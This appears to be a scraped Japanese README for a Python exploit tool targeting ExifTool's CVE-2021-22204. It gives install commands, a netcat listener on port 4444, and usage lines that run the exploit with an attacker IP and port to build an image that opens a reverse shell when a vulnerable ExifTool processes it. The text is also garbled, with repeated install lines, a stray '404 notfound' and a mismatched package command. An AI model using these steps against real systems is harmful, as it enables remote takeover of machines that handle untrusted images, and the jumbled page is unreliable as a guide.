
Python製のCVE-2021-22204(ExifTool)向けエクスプロイト。悪意のある画像を生成し、脆弱なバージョンで処理されるとリバースシェルを起動します。
Exiftool の CVE-2021-22204 脆弱性に対する Python エクスプロイトです。
404 notfound
python3 python3-pip djvulibre-bin exiftool
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
pacman -S djvulibre libimage-exiftool-perl python python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
brew install djvulibre exiftool python
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
sudo pip install -r requirements.txt
nc -nvlp 4444
chmod +x exploit.py
python3 exploit.py {あなたのIPアドレス} {あなたのリッスンポート}
./exploit.py {あなたのIPアドレス} {あなたのリッスンポート}
python3 exploit.py 192.168.0.1 4444
./exploit.py 192.168.0.1 4444
image.jpg
CVE-2021-22204 は William Bowling (@wcbowling) によって発見され、報告されました。
このエクスプロイトは、CVE が報告された後に exiftool のパッチを研究して作成されました。
そして、image.jpg は、脆弱性のある exiftool で開かれると脆弱性をトリガーします。